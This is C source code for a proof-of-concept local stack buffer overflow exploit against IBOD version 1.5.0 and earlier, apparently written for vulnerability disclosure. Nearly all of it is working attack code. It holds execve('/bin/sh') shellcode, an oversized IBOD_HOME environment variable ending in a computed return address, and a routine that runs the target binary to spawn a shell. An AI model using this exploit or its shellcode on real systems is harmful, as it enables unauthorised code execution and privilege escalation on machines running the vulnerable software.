/* ibod_bof.c
 *
 * IBOD <= 1.5.0 local buffer overflow exploit (Proof of Concept)
 *
 * Tested in Slackware Linux 10.0
 *
 * by CoKi <coki@nosystem.com.ar>
 * No System Group - http://www.nosystem.com.ar
 */

#include <stdio.h>
#include <strings.h>

#define BUFFER 540 + 4

char shellcode[]=
  "\x31\xc0"                         /* xor %eax,%eax    */
  "\x31\xd2"                         /* xor %edx,%edx    */
  "\x52"                             /* push %edx        */
  "\x68\x2f\x2f\x73\x68"             /* push $0x68732f2f */
  "\x68\x2f\x62\x69\x6e"             /* push $0x6e69622f */
  "\x89\xe3"                         /* movl %esp,%ebx   */
  "\x52"                             /* push %edx        */
  "\x53"                             /* push %ebx        */
  "\x89\xe1"                         /* movl %esp,%ecx   */
  "\xb0\x0b"                         /* mov $0xb,%al     */
  "\xcd\x80";                        /* int $0x80        */

void use(char *program);

int main(int argc, char *argv[]) {

  FILE *file;
  char buf[BUFFER], *path, tmp[BUFFER];
  char *buffer=buf;
  int ret;

  if(argc != 2) use(argv[0]);
  
  path = argv[1];

  if((file = fopen(path, "r")) == NULL) {
    printf(" Failed to open file!\n");
    exit(1);
  }

  ret = 0xbffffffa - strlen(shellcode) - strlen(path);
  
  bzero(buf, sizeof(buf));
  memset(buffer, 'A', BUFFER-4);

  sprintf(tmp, "%s", &ret);
  strncat(buf, tmp, 4);

  printf("\n ibod <= 1.5.0 local stack buffer overflow (Proof of Concept)\n");
  printf(" by CoKi <coki@nosystem.com.ar>\n\n");

  setenv("IBOD_HOME", buf, 1);
  setenv("SHELLCODE", shellcode, 1);

  execl(path, path, NULL);

}

void use(char *program) {
  printf(" Use: %s <path>\n", program);
  exit(1);
}